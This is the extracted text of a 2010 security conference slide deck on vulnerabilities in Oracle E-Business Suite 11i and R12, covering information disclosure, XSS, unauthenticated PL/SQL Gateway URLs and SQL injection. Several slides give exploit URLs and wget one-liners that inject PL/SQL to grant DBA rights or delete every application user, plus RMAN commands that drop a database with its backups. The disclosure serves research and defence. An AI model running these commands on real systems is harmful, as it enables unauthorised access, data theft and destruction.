Joxean Koret - Hackproofing Oracle Financials 11i & R12 [RootedCON 2010]

Vulnerabilities in Oracle Financials - Joxean

Koret

Hackproofing Oracle Financials

Vulnerabilities in Oracle E-Business Suite R12


Koret

What is Oracle Financials?

Is an Enterprise Resource Planing product

(ERP)

The names Oracle E-Business Suite, Oracle

Applications, Oracle Financials, etc... does refer

to the same product


Koret

ERP Statistics

As of 2005, SAP and Oracle Applications were

the most deployed


Koret

Market Share


Koret

Market Share


Koret

Market Share


Koret

Market Share


Koret

Who is using Oracle Financials?

Very large list of customers

http://www.oracle.com/customers/products/financials2.html

In short...

Militars & Governments, i.e.: North Atlantic Treaty

Organization (NATO)

Banks

Airways & Airlines

Petrochemical companies

Hospitals

...




Koret

Some well known customers

Marvel, Banque de France, U.S. Airways, U.S.

Navy, U.S. Army, Mitsubishi, Airtel, NH Hotels,

Canon, EMC Corporation, Flemish

Government, Fujitsu, Toshiba, Google Inc,

Unisys, U.S. Postal Service, Toyota, General

Electrics, Dubai's Government, Oracle itself,

etc...

Enough (and interesting) customers to care

about ;)


Koret

About the talk

What are we going to covert in this talk?

Architecture overview (Basic Concepts + Brief

introduction)

Components (11i & R12)

Design flaws

Vulnerabilities

How to own


Koret

Architecture Overview


Koret

Architecture: Attacker's point of view

Applications Server's components

Web Server, Forms Server (& Reports Server)

But Reports is not always available from internet

JSP, Servlets, CGIs and ”the” PL/SQL Gateway

PL/SQL Gateway removed in R12 due to many security

problems

Database Server's components

Data

PL/SQL software


Koret

Basic Concepts

Forms Server

Java Applet that communicates (via HTTP in the

latest versions) with the application server

Used to show GUIs

Reports Server

The same but only for reports

PL/SQL Gateway

A way to execute PL/SQL code directly from a

browser, like a CGI but inside the database


Koret

Information Gathering


Koret


Oracle Financials 11i

http://middletier/pls/DAD/fnd_web.ping

Oracle Financials R12

PL/SQL Gateway removed, URL changed to:

http://middletier/OA_HTML/jsp/fnd/fndping.jsp

What information we get this way?




Koret

Information Gathered


Koret


Install Path Disclosure


Koret

Install Path Disclosure

The script /OA_HTML/biserror.jsp receives a

parameter called ”DBC” (DataBase

Configuration)

Is a file in the middle-tier with information regarding

the database address, etc...

It reveals the installation path when a non-existent

DBC file is given to script


Koret

Installation Path Disclosure


Koret


The information retrieval (sometimes) is vital for succesful

intrusions

Databases's SID and schema (commonly APPS)

It's also typical to host multiple Oracle Financials

instances in the same machine:

/d01/apps/r12

/d02/apps/r11

You must know the operating system to completely own

the system


Koret

Vulnerabilities


Koret

Vulnerabilities by component

Middle-tier

Oracle Forms

PL/SQL gateway (only in version 11i)

JSP

Database backend

Oracle Database

Middle-tier (again)

The Printers From Hell


Koret

Vulnerabilities: Cross Site Scripting

Oracle Financials is full of XSS vulnerabilities

In example, the script biserror.jsp is designed to

show an error page with a custom message

The message text can be HTML code

By design!


Koret

XSS in biserror.jsp


Koret

Vulnerabilities

Cross Site Scripting vulnerabilities can only be

usefull (when you do not have real exploits) for:

Session hijacking

Phissing

Manipulating admin panels

Etc...

However, there are many very interesting

vulnerabilities in Oracle Financials so, ignore

XSS ;)


Koret

Mistakes

The very first vulnerability I found in Oracle Financials 11i

was only applicable to AIX (unfortunately)

The SYSADMIN has the responsibility (role) SYSADMIN

Looking for other users with the same responsibility...

...


Koret

Mistakes

The very first vulnerability I found in Oracle Financials 11i

was only applicable to AIX (unfortunately)

The SYSADMIN has the responsibility (role) SYSADMIN

Looking for other users with the same responsibility...

The GUEST user appears! So any GUEST user is, in

fact, SYSADMIN!!!

Cool!

Applicable to all Oracle Apps. 11i versions for AIX


Koret

For the developers...


Koret

Oracle Forms

One of the more interesting vulnerabilities is in

the Oracle Forms Listener.

Whenever a new user wants to connect to

Oracle Forms via web, a Login Form is shown

Is a Java Applet


Koret

The Login Form


Koret

Oracle Forms Listener

But, how is the form loaded? What parameters

are given from the browser to the server if any?

Remember, it's a Java applet that communicates

with the application server


Koret


Answer:


Koret


So, again, we have another installation path

disclosure but, wait...

What if you're able to upload a new form to the

server, to a temporary path, in example?

The form will be executed before doing logon

Possible temporary paths:

/incoming

/tmp


Koret


The source code of almost every form in Oracle

Financials is available:

Source code for login form is in

$FND_TOP/US/FNDSCSGN.fmb


Koret

Oracle Forms Source

$ cd $FND_TOP

$ pwd

/u03/oracle/prodappl/fnd/11.5.0/

$ cd forms

$ ls

E US

$ ls US/

APPTREE.fmx FNDATENT.fmx FNDCPDIA.fmx FNDCUSTM.fmx FNDFFMIS.fmx

FNDFMFUN.fmx FNDPOMPV.fmx FNDSCAUS.fmx FNDSNDSQ.fmx FNDADDSQ.fmx

FNDATFUN.fmx FNDCPDPD.fmx FNDFBMAS.fmx FNDFFMSA.fmx FNDLVMLU.fmx

FNDPOMSV.fmx FNDSCDDG.fmx TEMPLATE.fmx (...)


Koret

Old Vulnerabilities: PL/SQL Gateway

In the prior version (Oracle Financials 11i)

almost all the vulnerabilities I found were SQL

Injection or ”mistakes”

Thanks to the PL/SQL Gateway

I'm going to tell you about various of them

Sorry, no demo for this version :(


Koret

The PL/SQL Gateway

What is the PL/SQL Gateway?

Is a way to directly execute PL/SQL code in the

database via a browser


Koret

The PL/SQL Gateway

What is the PL/SQL Gateway?

Is a way to directly execute PL/SQL code in the

database via a browser

”Where you see a feature I see a flaw!”

What if the PL/SQL code contains

vulnerabilities?


Koret

The PL/SQL Gateway

Remember, the PL/SQL Gateway is a way to

directly execute PL/SQL code in the database

via a browser

”Where you see a feature I see a flaw!”

What if the PL/SQL code contains

vulnerabilities?

You're running code directly in the database

You can run any procedure granted to public

A lot of them, about thousands in total

Cool!


Koret

Some reported & fixed vulnerabilities

http://<target>/pls/<DAD>/ADI_display_report.

DisplayFile?P_DOCID=<doc id>

http://<target>/pls/<DAD>/ADI_BINARY_FILE.

Show?p_DocumentId=<doc id>

Download any document stored in the ERP

(contracts, etc...) without being authenticated

Just brute force the doc_id and that's all


Koret

PL/SQL Gateway

But, wait! I don't know the DAD?

OK, simply navigate with your browser to the following

location:

http://<target>:<port>/pls/

You will be redirected to the URL /pls/DAD/fnd_web.ping

In Oracle Apps since 11.5.10.2 you will get the message

”Unauthorized”

But, well, when accessing to the URL you were

redirected to...


Koret

More vulnerabilities in Apps 11i

How can I see the complete list of customers

and contacts of my adversary corporation?


Koret

More vulnerabilities in Apps 11i

How can I see the complete list of customers

and contacts of my adversary corporation?

Easy! The following URL is your answer:

/pls/<DAD>/ICXSUPWF.DISPLAYCONTACTS

No check for valid session, valid privileges, etc...

The complete list of customers and contacts is printed in the web page

Cool++!


Koret

SQL Injection

Another vulnerable package (the name says that it's surely

vulnerable)

/pls/DAD/ICX_UTIL.LOVVALUES

A LOV, in Oracle language, is a List Of Values

Typically, an SQL query to show some data

The script receives 2 cool parameters:

c_where_clause & c_js_where_clause

Guess what is the purpose of the parameters?

Cool^2


Koret

Returning back to ICXSUPWF.DISPLAYCONTACTS

Do you remember the package to download the

complete customer's list?

Well, this package also receives a seemingly

equal parameter:

p_where

Of course, this is one SQL's where clause


Koret

Sufficient SQL Injections

OK, we have sufficient ”SQL injections?” (or

design flaws?) for now but, what can I do with

them?

Well, some facts:

You're running your SQL code as the APPS user

The APPS user is the owner of the ERP's data

So you're the new owner of the data :)

Also, the APPS user has granted the DBA role

So you're also the new DBA


Koret

Oracle Database User APPS

Running SQL code as any DBA you can do whatever you want

as, in example:

Create a Java procedure to execute OS commands and to

connect back to you

Create a PL/SQL backdoor to make ”easier?” executing new

commands

Execute a funny OS + RMAN command:

$ rman target /

rman> sql 'shutdown abort'

rman> drop database including backups noprompt;

And kill her wife if possible


Koret


I think that I showed sufficient (old, fixed) Oracle

Apps 11i vulnerabilities

Now, it's time for Oracle Applications R12


Koret

Oracle Applications R12: Changes

In this version Oracle removed the PL/SQL

Gateway

No fun :(

But they ported almost all the packages to JSP

So the unique change for us is that we don't

need a DAD this time, we already know the

complete URL to access every JSP

http://<target>:<port>/OA_HTML/<yourjsp.jsp>


Koret

Oracle Applications R12: Changes

In this version they check in almost all JSP

scripts for a valid session, except for allowed to

GUEST applications

However, we can still get fun ;)


Koret

Establishing a GUEST session

To establish a GUEST session you just need to

navigate to any ”allowed to GUEST” jsp and,

automagically, a new session will be created for

you


Koret

Guest Sessions

When you want to do logon via the web page you're received

with a web page similar if not equal to the following one:


Koret

Guest Sessions

When you do logon correctly you're redirected to the

following web page:


Koret

Guest Sessions

If you navigate (before doing logon) directly to

this web page an exception occurs but a new

GUEST session gets created.


Koret

Servlet's Source Code


Koret

Guest Sessions

With a valid GUEST session we can, now,

access any JSP.

But some of them will check if we have the correct

privileges or simply fail because we're not

SYSADMIN, etc...

Anyway, our attack vector has significantly

increased :)


Koret


OK so... Do you remember the flaws where you

can inject any where clause in Oracle Apps 11i?

Well, Oracle always surprised me...


Koret

Oracle Applications R12

In this version they added a cool script called

jtfwcpnt.jsp.

It is a component of the Oracle FinancialsCRM

In Oracle words:

“A Card Paint to display cards in Smart ListSearch”

Questions to Larry Ellison, plz!

The script is completely flawed.


Koret

jtfwcpnt.jsp

This cool script receives one interesting

parameter:

query

Do I need to explain something else?


Koret

jtfwcpnt.jsp

This cool script receives one interesting

parameter:

query

Do I need to explain something else?

Let's see a very complicated exploit...


Koret

jtfwcnpt.jsp 0days 3xpl01ts

$ export TARGET=”http://<target>:<port>/OA_HTML”

$ wget -O - “$TARGET/OA.jsp”

"$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'

grant%20dba%20to%20mom';%20end;”

$ wget -O - “$TARGET/OA.jsp”

"$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'

delete%20from%20apps.fnd_user';%20commit;end;”


Koret

Creating a new SYSADMIN user

We're running code as the APPS user so,

again, we're the new owner of the data

So we can, in example, create a new SYSADMIN

like user:


Koret


Koret

Responsibilities

Running this PL/SQL code via the jtfwcpnt.jsp

script we create a new user and assign 2

responsibilities:

20420 – System Administrator (SYSADMIN)

20872 – System Administration


Koret

Owning by tiers

Abusing from this flaw we gained access to the

database backend

If we just want to extract some data, we're done,

delete the created user and that's all

However, if we want to continue owning all the

rest of the tiers we need to find a way to

execute code also in the middle-tier

Remember, we gained access to the database and

it will be in a different box :(


Koret

Gaining Access to the Middle-tiers

How can we gain access to the middle-tiers?

Checked for a flawed JSP that writes something to

disk, but nothing was found

Checked also for Runtime.getRuntime() and so on:

No luck :(


Koret

Gaining Access to the Middle-tiers

How can we gain access to the middle-tiers?

Checked for a flawed JSP that writes something to

disk, but nothing was found

Checked also for Runtime.getRuntime() and so on:

No luck :(

But found a funny technique:

The Printer From Hell


Koret

The Printers From Hell


Koret


Oracle Applications Server is a web based

application

It's designed to be used by big companies

either connected from LAN or from Internet

They designed a way to print to one system

administrator specified printer from anywhere

But, how are the printers configured?

Administrator does this via the ERP or directly inserting

into the database


Koret



Koret


We have a ”printer coming from hell”, just print

something using the ERP or the PL/SQL

packages and you're done


Koret


We have a ”printer coming from hell”, just print

something using the ERP or the PL/SQL

packages and you're done

Th3 c0mpl3t3 $y$t3m w4$ 0wN3|)


Koret

However...

We're running code as the ”oracle” OS level

user but I know no way to scalate to root :(

Well, if the database server is not correctly patched

we can always use the ”extjob” suid tool

Vulnerability CVE-2008-2613

But, what if the system is a Win32 box?

Don't worry! You're already running code as Local

System :)


Koret

● Conclussions


Koret


It's getting better in some aspects but there are plenty of

quite stupid vulnerabilities

It's OK (in my opinion) to run it in our companies as an

intranet application but you should take care opening

connectivity to Oracle Financials from Internet

IMHO...


Koret

Final Conclussion?


Koret

The End

● Thanks you folks!

Date post:	05-Dec-2014
Category:	Technology
Upload:	rootedcon
View:	8,159 times
Download:	1 times

Joxean Koret - Hackproofing Oracle Financials 11i & R12 [RootedCON 2010]

Technology